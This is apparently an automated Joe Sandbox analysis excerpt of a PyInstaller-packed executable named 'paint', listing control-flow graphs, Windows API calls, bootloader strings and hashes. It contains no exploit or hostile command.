                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                                                • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                                                • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                                                • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                                                • Instruction ID: a22e0a3c8163d40ef9c95ded053830d06f46bc37fcf410426d6ab20a6e838ce3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0D1C232A09A82E6EB108F74E8506A97765FF86B59F800235DA6E837E4EF3DD104C700

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 62 7ff6f0bd1000-7ff6f0bd3806 call 7ff6f0bdfe88 call 7ff6f0bdfe90 call 7ff6f0bdc8c0 call 7ff6f0be5460 call 7ff6f0be54f4 call 7ff6f0bd36b0 76 7ff6f0bd3814-7ff6f0bd3836 call 7ff6f0bd1950 62->76 77 7ff6f0bd3808-7ff6f0bd380f 62->77 82 7ff6f0bd391b-7ff6f0bd3931 call 7ff6f0bd45b0 76->82 83 7ff6f0bd383c-7ff6f0bd3856 call 7ff6f0bd1c80 76->83 78 7ff6f0bd3c97-7ff6f0bd3cb2 call 7ff6f0bdc5c0 77->78 90 7ff6f0bd3933-7ff6f0bd3960 call 7ff6f0bd7f80 82->90 91 7ff6f0bd396a-7ff6f0bd397f call 7ff6f0bd2710 82->91 87 7ff6f0bd385b-7ff6f0bd389b call 7ff6f0bd8a20 83->87 96 7ff6f0bd38c1-7ff6f0bd38cc call 7ff6f0be4fa0 87->96 97 7ff6f0bd389d-7ff6f0bd38a3 87->97 99 7ff6f0bd3962-7ff6f0bd3965 call 7ff6f0be00bc 90->99 100 7ff6f0bd3984-7ff6f0bd39a6 call 7ff6f0bd1c80 90->100 101 7ff6f0bd3c8f 91->101 109 7ff6f0bd38d2-7ff6f0bd38e1 call 7ff6f0bd8a20 96->109 110 7ff6f0bd39fc-7ff6f0bd3a2a call 7ff6f0bd8b30 call 7ff6f0bd8b90 * 3 96->110 102 7ff6f0bd38a5-7ff6f0bd38ad 97->102 103 7ff6f0bd38af-7ff6f0bd38bd call 7ff6f0bd8b90 97->103 99->91 115 7ff6f0bd39b0-7ff6f0bd39b9 100->115 101->78 102->103 103->96 119 7ff6f0bd39f4-7ff6f0bd39f7 call 7ff6f0be4fa0 109->119 120 7ff6f0bd38e7-7ff6f0bd38ed 109->120 138 7ff6f0bd3a2f-7ff6f0bd3a3e call 7ff6f0bd8a20 110->138 115->115 118 7ff6f0bd39bb-7ff6f0bd39d8 call 7ff6f0bd1950 115->118 118->87 130 7ff6f0bd39de-7ff6f0bd39ef call 7ff6f0bd2710 118->130 119->110 124 7ff6f0bd38f0-7ff6f0bd38fc 120->124 127 7ff6f0bd3905-7ff6f0bd3908 124->127 128 7ff6f0bd38fe-7ff6f0bd3903 124->128 127->119 131 7ff6f0bd390e-7ff6f0bd3916 call 7ff6f0be4fa0 127->131 128->124 128->127 130->101 131->138 141 7ff6f0bd3a44-7ff6f0bd3a47 138->141 142 7ff6f0bd3b45-7ff6f0bd3b53 138->142 141->142 145 7ff6f0bd3a4d-7ff6f0bd3a50 141->145 143 7ff6f0bd3a67 142->143 144 7ff6f0bd3b59-7ff6f0bd3b5d 142->144 146 7ff6f0bd3a6b-7ff6f0bd3a90 call 7ff6f0be4fa0 143->146 144->146 147 7ff6f0bd3b14-7ff6f0bd3b17 145->147 148 7ff6f0bd3a56-7ff6f0bd3a5a 145->148 157 7ff6f0bd3a92-7ff6f0bd3aa6 call 7ff6f0bd8b30 146->157 158 7ff6f0bd3aab-7ff6f0bd3ac0 146->158 149 7ff6f0bd3b2f-7ff6f0bd3b40 call 7ff6f0bd2710 147->149 150 7ff6f0bd3b19-7ff6f0bd3b1d 147->150 148->147 152 7ff6f0bd3a60 148->152 159 7ff6f0bd3c7f-7ff6f0bd3c87 149->159 150->149 153 7ff6f0bd3b1f-7ff6f0bd3b2a 150->153 152->143 153->146 157->158 161 7ff6f0bd3ac6-7ff6f0bd3aca 158->161 162 7ff6f0bd3be8-7ff6f0bd3bfa call 7ff6f0bd8a20 158->162 159->101 164 7ff6f0bd3ad0-7ff6f0bd3ae8 call 7ff6f0be52c0 161->164 165 7ff6f0bd3bcd-7ff6f0bd3be2 call 7ff6f0bd1940 161->165 170 7ff6f0bd3c2e 162->170 171 7ff6f0bd3bfc-7ff6f0bd3c02 162->171 175 7ff6f0bd3b62-7ff6f0bd3b7a call 7ff6f0be52c0 164->175 176 7ff6f0bd3aea-7ff6f0bd3b02 call 7ff6f0be52c0 164->176 165->161 165->162 177 7ff6f0bd3c31-7ff6f0bd3c40 call 7ff6f0be4fa0 170->177 173 7ff6f0bd3c04-7ff6f0bd3c1c 171->173 174 7ff6f0bd3c1e-7ff6f0bd3c2c 171->174 173->177 174->177 186 7ff6f0bd3b7c-7ff6f0bd3b80 175->186 187 7ff6f0bd3b87-7ff6f0bd3b9f call 7ff6f0be52c0 175->187 176->165 188 7ff6f0bd3b08-7ff6f0bd3b0f 176->188 184 7ff6f0bd3d41-7ff6f0bd3d63 call 7ff6f0bd44d0 177->184 185 7ff6f0bd3c46-7ff6f0bd3c4a 177->185 199 7ff6f0bd3d65-7ff6f0bd3d6f call 7ff6f0bd4620 184->199 200 7ff6f0bd3d71-7ff6f0bd3d82 call 7ff6f0bd1c80 184->200 189 7ff6f0bd3cd4-7ff6f0bd3ce6 call 7ff6f0bd8a20 185->189 190 7ff6f0bd3c50-7ff6f0bd3c5f call 7ff6f0bd90e0 185->190 186->187 201 7ff6f0bd3ba1-7ff6f0bd3ba5 187->201 202 7ff6f0bd3bac-7ff6f0bd3bc4 call 7ff6f0be52c0 187->202 188->165 206 7ff6f0bd3d35-7ff6f0bd3d3c 189->206 207 7ff6f0bd3ce8-7ff6f0bd3ceb 189->207 204 7ff6f0bd3cb3-7ff6f0bd3cb6 call 7ff6f0bd8850 190->204 205 7ff6f0bd3c61 190->205 214 7ff6f0bd3d87-7ff6f0bd3d96 199->214 200->214 201->202 202->165 216 7ff6f0bd3bc6 202->216 221 7ff6f0bd3cbb-7ff6f0bd3cbd 204->221 211 7ff6f0bd3c68 call 7ff6f0bd2710 205->211 206->211 207->206 212 7ff6f0bd3ced-7ff6f0bd3d10 call 7ff6f0bd1c80 207->212 224 7ff6f0bd3c6d-7ff6f0bd3c77 211->224 229 7ff6f0bd3d12-7ff6f0bd3d26 call 7ff6f0bd2710 call 7ff6f0be4fa0 212->229 230 7ff6f0bd3d2b-7ff6f0bd3d33 call 7ff6f0be4fa0 212->230 219 7ff6f0bd3dc4-7ff6f0bd3dda call 7ff6f0bd9400 214->219 220 7ff6f0bd3d98-7ff6f0bd3d9f 214->220 216->165 232 7ff6f0bd3ddc 219->232 233 7ff6f0bd3de8-7ff6f0bd3e04 SetDllDirectoryW 219->233 220->219 226 7ff6f0bd3da1-7ff6f0bd3da5 220->226 222 7ff6f0bd3cbf-7ff6f0bd3cc6 221->222 223 7ff6f0bd3cc8-7ff6f0bd3ccf 221->223 222->211 223->214 224->159 226->219 231 7ff6f0bd3da7-7ff6f0bd3dbe SetDllDirectoryW LoadLibraryExW 226->231 229->224 230->214 231->219 232->233 237 7ff6f0bd3f01-7ff6f0bd3f08 233->237 238 7ff6f0bd3e0a-7ff6f0bd3e19 call 7ff6f0bd8a20 233->238 242 7ff6f0bd3f0e-7ff6f0bd3f15 237->242 243 7ff6f0bd3ffc-7ff6f0bd4004 237->243 251 7ff6f0bd3e32-7ff6f0bd3e3c call 7ff6f0be4fa0 238->251 252 7ff6f0bd3e1b-7ff6f0bd3e21 238->252 242->243 244 7ff6f0bd3f1b-7ff6f0bd3f25 call 7ff6f0bd33c0 242->244 245 7ff6f0bd4006-7ff6f0bd4023 PostMessageW GetMessageW 243->245 246 7ff6f0bd4029-7ff6f0bd405b call 7ff6f0bd36a0 call 7ff6f0bd3360 call 7ff6f0bd3670 call 7ff6f0bd6fb0 call 7ff6f0bd6d60 243->246 244->224 258 7ff6f0bd3f2b-7ff6f0bd3f3f call 7ff6f0bd90c0 244->258 245->246 263 7ff6f0bd3ef2-7ff6f0bd3efc call 7ff6f0bd8b30 251->263 264 7ff6f0bd3e42-7ff6f0bd3e48 251->264 255 7ff6f0bd3e23-7ff6f0bd3e2b 252->255 256 7ff6f0bd3e2d-7ff6f0bd3e2f 252->256 255->256 256->251 269 7ff6f0bd3f64-7ff6f0bd3fa0 call 7ff6f0bd8b30 call 7ff6f0bd8bd0 call 7ff6f0bd6fb0 call 7ff6f0bd6d60 call 7ff6f0bd8ad0 258->269 270 7ff6f0bd3f41-7ff6f0bd3f5e PostMessageW GetMessageW 258->270 263->237 264->263 268 7ff6f0bd3e4e-7ff6f0bd3e54 264->268 272 7ff6f0bd3e5f-7ff6f0bd3e61 268->272 273 7ff6f0bd3e56-7ff6f0bd3e58 268->273 306 7ff6f0bd3fa5-7ff6f0bd3fa7 269->306 270->269 272->237 275 7ff6f0bd3e67-7ff6f0bd3e83 call 7ff6f0bd6db0 call 7ff6f0bd7330 272->275 274 7ff6f0bd3e5a 273->274 273->275 274->237 289 7ff6f0bd3e85-7ff6f0bd3e8c 275->289 290 7ff6f0bd3e8e-7ff6f0bd3e95 275->290 292 7ff6f0bd3edb-7ff6f0bd3ef0 call 7ff6f0bd2a50 call 7ff6f0bd6fb0 call 7ff6f0bd6d60 289->292 293 7ff6f0bd3eaf-7ff6f0bd3eb9 call 7ff6f0bd71a0 290->293 294 7ff6f0bd3e97-7ff6f0bd3ea4 call 7ff6f0bd6df0 290->294 292->237 304 7ff6f0bd3ec4-7ff6f0bd3ed2 call 7ff6f0bd74e0 293->304 305 7ff6f0bd3ebb-7ff6f0bd3ec2 293->305 294->293 308 7ff6f0bd3ea6-7ff6f0bd3ead 294->308 304->237 317 7ff6f0bd3ed4 304->317 305->292 310 7ff6f0bd3fe9-7ff6f0bd3ff7 call 7ff6f0bd1900 306->310 311 7ff6f0bd3fa9-7ff6f0bd3fb3 call 7ff6f0bd9200 306->311 308->292 310->224 311->310 321 7ff6f0bd3fb5-7ff6f0bd3fca 311->321 317->292 322 7ff6f0bd3fe4 call 7ff6f0bd2a50 321->322 323 7ff6f0bd3fcc-7ff6f0bd3fdf call 7ff6f0bd2710 call 7ff6f0bd1900 321->323 322->310 323->224
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                                                • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                                                                                • API String ID: 2776309574-4232158417
                                                                                                                                                                                                                                                                • Opcode ID: 230e5f2fbe18b706386c2e6c5de042c78cdf1bdf29ac743ce162c0a9040f007d
                                                                                                                                                                                                                                                                • Instruction ID: b7b4922780083decd8472ad9f1faaa48d88e0f93a3ca88e2fd82dc7981fd91c0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 230e5f2fbe18b706386c2e6c5de042c78cdf1bdf29ac743ce162c0a9040f007d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA326E25A0E682B1EB259B2496543B9E752AF56B80FC44032DA6FC33D7FF2EE555C300

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 536 7ff6f0bf69d4-7ff6f0bf6a47 call 7ff6f0bf6708 539 7ff6f0bf6a61-7ff6f0bf6a6b call 7ff6f0be8590 536->539 540 7ff6f0bf6a49-7ff6f0bf6a52 call 7ff6f0be4f58 536->540 546 7ff6f0bf6a6d-7ff6f0bf6a84 call 7ff6f0be4f58 call 7ff6f0be4f78 539->546 547 7ff6f0bf6a86-7ff6f0bf6aef CreateFileW 539->547 545 7ff6f0bf6a55-7ff6f0bf6a5c call 7ff6f0be4f78 540->545 560 7ff6f0bf6da2-7ff6f0bf6dc2 545->560 546->545 550 7ff6f0bf6af1-7ff6f0bf6af7 547->550 551 7ff6f0bf6b6c-7ff6f0bf6b77 GetFileType 547->551 556 7ff6f0bf6b39-7ff6f0bf6b67 GetLastError call 7ff6f0be4eec 550->556 557 7ff6f0bf6af9-7ff6f0bf6afd 550->557 553 7ff6f0bf6bca-7ff6f0bf6bd1 551->553 554 7ff6f0bf6b79-7ff6f0bf6bb4 GetLastError call 7ff6f0be4eec CloseHandle 551->554 563 7ff6f0bf6bd3-7ff6f0bf6bd7 553->563 564 7ff6f0bf6bd9-7ff6f0bf6bdc 553->564 554->545 571 7ff6f0bf6bba-7ff6f0bf6bc5 call 7ff6f0be4f78 554->571 556->545 557->556 558 7ff6f0bf6aff-7ff6f0bf6b37 CreateFileW 557->558 558->551 558->556 568 7ff6f0bf6be2-7ff6f0bf6c37 call 7ff6f0be84a8 563->568 564->568 569 7ff6f0bf6bde 564->569 574 7ff6f0bf6c39-7ff6f0bf6c45 call 7ff6f0bf6910 568->574 575 7ff6f0bf6c56-7ff6f0bf6c87 call 7ff6f0bf6488 568->575 569->568 571->545 574->575 581 7ff6f0bf6c47 574->581 582 7ff6f0bf6c8d-7ff6f0bf6ccf 575->582 583 7ff6f0bf6c89-7ff6f0bf6c8b 575->583 584 7ff6f0bf6c49-7ff6f0bf6c51 call 7ff6f0beab30 581->584 585 7ff6f0bf6cf1-7ff6f0bf6cfc 582->585 586 7ff6f0bf6cd1-7ff6f0bf6cd5 582->586 583->584 584->560 587 7ff6f0bf6d02-7ff6f0bf6d06 585->587 588 7ff6f0bf6da0 585->588 586->585 590 7ff6f0bf6cd7-7ff6f0bf6cec 586->590 587->588 591 7ff6f0bf6d0c-7ff6f0bf6d51 CloseHandle CreateFileW 587->591 588->560 590->585 593 7ff6f0bf6d53-7ff6f0bf6d81 GetLastError call 7ff6f0be4eec call 7ff6f0be86d0 591->593 594 7ff6f0bf6d86-7ff6f0bf6d9b 591->594 593->594 594->588
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1617910340-0
                                                                                                                                                                                                                                                                • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                                                • Instruction ID: 38828b328dd74633a06efc509083ae11ea937120d790e1ddf9eecf71d5b71c3f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CFC1E13AB28A4295EB10CFA4C4916AC3769FB4AB98B415235DE2FD77D5EF3AD411C300

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(?,00007FF6F0BD8B09,00007FF6F0BD3FA5), ref: 00007FF6F0BD841B
                                                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,00007FF6F0BD8B09,00007FF6F0BD3FA5), ref: 00007FF6F0BD849E
                                                                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(?,00007FF6F0BD8B09,00007FF6F0BD3FA5), ref: 00007FF6F0BD84BD
                                                                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(?,00007FF6F0BD8B09,00007FF6F0BD3FA5), ref: 00007FF6F0BD84CB
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?,00007FF6F0BD8B09,00007FF6F0BD3FA5), ref: 00007FF6F0BD84DC
                                                                                                                                                                                                                                                                • RemoveDirectoryW.KERNELBASE(?,00007FF6F0BD8B09,00007FF6F0BD3FA5), ref: 00007FF6F0BD84E5
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                                • String ID: %s\*
                                                                                                                                                                                                                                                                • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                                                • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                                                • Instruction ID: 9a8a52e998d158609c3b3ae7c450f573cf65c3b4f330eb4458d2075b307f4148
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC41C225A0E943A0EB209B60E4545B9A365FF96B55FC00232D56FC37C4FF3EE5068B00
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                                                • Instruction ID: fbfd0f38adec2e3a5c335ca5765c14d5955c3f924ee9959431f62da887e86d82
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4F0C866A19742C6F7A08BA0B459766B351AB89338F840335DA7E427D4EF3CD049CB00
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1010374628-0
                                                                                                                                                                                                                                                                • Opcode ID: 2d471da97334de2acf0262392bad6ca7d41a72817533bf8b70dbf69db73f0db4
                                                                                                                                                                                                                                                                • Instruction ID: f7834b25f92ca8bf010d167672afe9b3cbf177e30ceb5b71c48e1d7453fee545
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d471da97334de2acf0262392bad6ca7d41a72817533bf8b70dbf69db73f0db4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D002A129E2D64360FB65AB9598002796698AF47B91FC58634DD7FC73E2FE7EB4018300

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 329 7ff6f0bd1950-7ff6f0bd198b call 7ff6f0bd45b0 332 7ff6f0bd1c4e-7ff6f0bd1c72 call 7ff6f0bdc5c0 329->332 333 7ff6f0bd1991-7ff6f0bd19d1 call 7ff6f0bd7f80 329->333 338 7ff6f0bd1c3b-7ff6f0bd1c3e call 7ff6f0be00bc 333->338 339 7ff6f0bd19d7-7ff6f0bd19e7 call 7ff6f0be0744 333->339 343 7ff6f0bd1c43-7ff6f0bd1c4b 338->343 344 7ff6f0bd1a08-7ff6f0bd1a24 call 7ff6f0be040c 339->344 345 7ff6f0bd19e9-7ff6f0bd1a03 call 7ff6f0be4f78 call 7ff6f0bd2910 339->345 343->332 350 7ff6f0bd1a45-7ff6f0bd1a5a call 7ff6f0be4f98 344->350 351 7ff6f0bd1a26-7ff6f0bd1a40 call 7ff6f0be4f78 call 7ff6f0bd2910 344->351 345->338 359 7ff6f0bd1a7b-7ff6f0bd1afc call 7ff6f0bd1c80 * 2 call 7ff6f0be0744 350->359 360 7ff6f0bd1a5c-7ff6f0bd1a76 call 7ff6f0be4f78 call 7ff6f0bd2910 350->360 351->338 371 7ff6f0bd1b01-7ff6f0bd1b14 call 7ff6f0be4fb4 359->371 360->338 374 7ff6f0bd1b35-7ff6f0bd1b4e call 7ff6f0be040c 371->374 375 7ff6f0bd1b16-7ff6f0bd1b30 call 7ff6f0be4f78 call 7ff6f0bd2910 371->375 380 7ff6f0bd1b6f-7ff6f0bd1b8b call 7ff6f0be0180 374->380 381 7ff6f0bd1b50-7ff6f0bd1b6a call 7ff6f0be4f78 call 7ff6f0bd2910 374->381 375->338 389 7ff6f0bd1b9e-7ff6f0bd1bac 380->389 390 7ff6f0bd1b8d-7ff6f0bd1b99 call 7ff6f0bd2710 380->390 381->338 389->338 393 7ff6f0bd1bb2-7ff6f0bd1bb9 389->393 390->338 395 7ff6f0bd1bc1-7ff6f0bd1bc7 393->395 396 7ff6f0bd1be0-7ff6f0bd1bef 395->396 397 7ff6f0bd1bc9-7ff6f0bd1bd6 395->397 396->396 398 7ff6f0bd1bf1-7ff6f0bd1bfa 396->398 397->398 399 7ff6f0bd1c0f 398->399 400 7ff6f0bd1bfc-7ff6f0bd1bff 398->400 402 7ff6f0bd1c11-7ff6f0bd1c24 399->402 400->399 401 7ff6f0bd1c01-7ff6f0bd1c04 400->401 401->399 403 7ff6f0bd1c06-7ff6f0bd1c09 401->403 404 7ff6f0bd1c2d-7ff6f0bd1c39 402->404 405 7ff6f0bd1c26 402->405 403->399 406 7ff6f0bd1c0b-7ff6f0bd1c0d 403->406 404->338 404->395 405->404 406->402
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD7F80: _fread_nolock.LIBCMT ref: 00007FF6F0BD802A
                                                                                                                                                                                                                                                                • _fread_nolock.LIBCMT ref: 00007FF6F0BD1A1B
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6F0BD1B6A), ref: 00007FF6F0BD295E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
